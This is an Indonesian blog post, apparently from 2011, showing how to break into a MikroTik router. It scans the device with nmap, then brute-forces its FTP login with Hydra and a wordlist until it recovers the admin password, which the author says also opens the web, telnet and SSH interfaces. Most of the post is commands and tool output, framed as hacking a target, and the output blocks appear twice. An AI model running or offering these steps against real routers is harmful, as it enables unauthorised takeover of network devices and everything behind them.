Tidak ada sistem yang aman 100%, karena begitu banyak kemungkinan jika kita melihat dari berbagai sisi, sebelumnya penulis menulis artikel untuk hacking mikrotik dari sisi celah di telnet, tapi sebenarnya sama bahayanya dengan telnet yaitu FTP.
Percobaan penulis melakukan serangan BF (brute force) pada http, telnet dan ssh mengalami kegagalan, setelah termenung sekian lama ahkirnya penulis ingat serangan BF pada FTP di waktu sebelumnya, ahkirnya penulis mencoba melakukan BF pada FTP dan hasilnya ternyata bisa. Hmm username dan password untuk http, telnet, ssh, telnet adalah sama, satu celah kena maka semua kena, jadi?
Dari sisi kompatibilitas mikrotik dapat diancungi jempol tapi akibat dari banyaknya kompatibilitas yang ada dapat membawa ancaman lebih besar, seperti pada telnet yang penulis bahas dan praktek diartikel yang sebelumnya.
Oke, kita langsung praktek saja, kita periksa port yang terbuka di mikrotik
C:\Documents and Settings\serverdata>nmap -A 192.168.1.174
Starting Nmap 5.21 ( http://nmap.org ) at 2011-11-07 15:36 Pacific Standard Time
Nmap scan report for 192.168.1.174
Host is up (0.00013s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp MikroTik router ftpd 3.20
22/tcp open ssh OpenSSH 2.3.0 mikrotik 2.9 (protocol 1.99)
|_sshv1: Server supports SSHv1
| ssh-hostkey: 1024 c6:5e:04:d3:12:db:1d:98:c9:17:e2:98:77:d4:39:ba (RSA1)
|_1024 76:68:bc:ee:e3:40:f5:6b:72:ea:44:55:df:86:06:ec (DSA)
23/tcp open telnet Linux telnetd
80/tcp open http MikroTik router http config
|_html-title: mikrotik routeros > administration
2000/tcp open winbox MikroTik WinBox management console
8080/tcp open http-proxy Mikrotik http proxy
8291/tcp open unknown
MAC Address: 08:00:27:22:84:F1 (Cadmus Computer Systems)
Device type: media device
Running: Chumby embedded
OS details: Chumby Internet radio
Network Distance: 1 hop
Service Info: OS: Linux; Device: router
Host is up (0.00013s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp MikroTik router ftpd 3.20
22/tcp open ssh OpenSSH 2.3.0 mikrotik 2.9 (protocol 1.99)
|_sshv1: Server supports SSHv1
| ssh-hostkey: 1024 c6:5e:04:d3:12:db:1d:98:c9:17:e2:98:77:d4:39:ba (RSA1)
|_1024 76:68:bc:ee:e3:40:f5:6b:72:ea:44:55:df:86:06:ec (DSA)
23/tcp open telnet Linux telnetd
80/tcp open http MikroTik router http config
|_html-title: mikrotik routeros > administration
2000/tcp open winbox MikroTik WinBox management console
8080/tcp open http-proxy Mikrotik http proxy
8291/tcp open unknown
MAC Address: 08:00:27:22:84:F1 (Cadmus Computer Systems)
Device type: media device
Running: Chumby embedded
OS details: Chumby Internet radio
Network Distance: 1 hop
Service Info: OS: Linux; Device: router
HOP RTT ADDRESS
1 0.13 ms 192.168.1.174
1 0.13 ms 192.168.1.174
OS and Service detection performed. Please report any incorrect results at http:
//nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 170.00 seconds
//nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 170.00 seconds
Ternyata banyak port dan service yang terbuka di mikrotik.
Oke tidak perlu berpanjang-panjang lebar lagi, kita langsung hack saja mikrotik target.
C:\Documents and Settings\serverdata>
Anda bisa menggunakan tool Hydra GUI buatan Yogyafree disini
C:\hydra>hydra -l admin -P kamus.txt 192.168.1.174 ftp
Hydra v6.0 (c) 2011 by van Hauser / THC – use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2011-11-07 14:39:20
[DATA] 16 tasks, 1 servers, 23 login tries (l:1/p:23), ~1 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: 192.168.1.174 login: admin password: jagoan
[STATUS] attack finished for 192.168.1.174 (waiting for childs to finish)
Hydra (http://www.thc.org) finished at 2011-11-07 14:39:26
Hydra v6.0 (c) 2011 by van Hauser / THC – use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2011-11-07 14:39:20
[DATA] 16 tasks, 1 servers, 23 login tries (l:1/p:23), ~1 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: 192.168.1.174 login: admin password: jagoan
[STATUS] attack finished for 192.168.1.174 (waiting for childs to finish)
Hydra (http://www.thc.org) finished at 2011-11-07 14:39:26
Binggo, password mikrotik sudah didapat, kita coba masuk lewat web.
0 komentar:
Post a Comment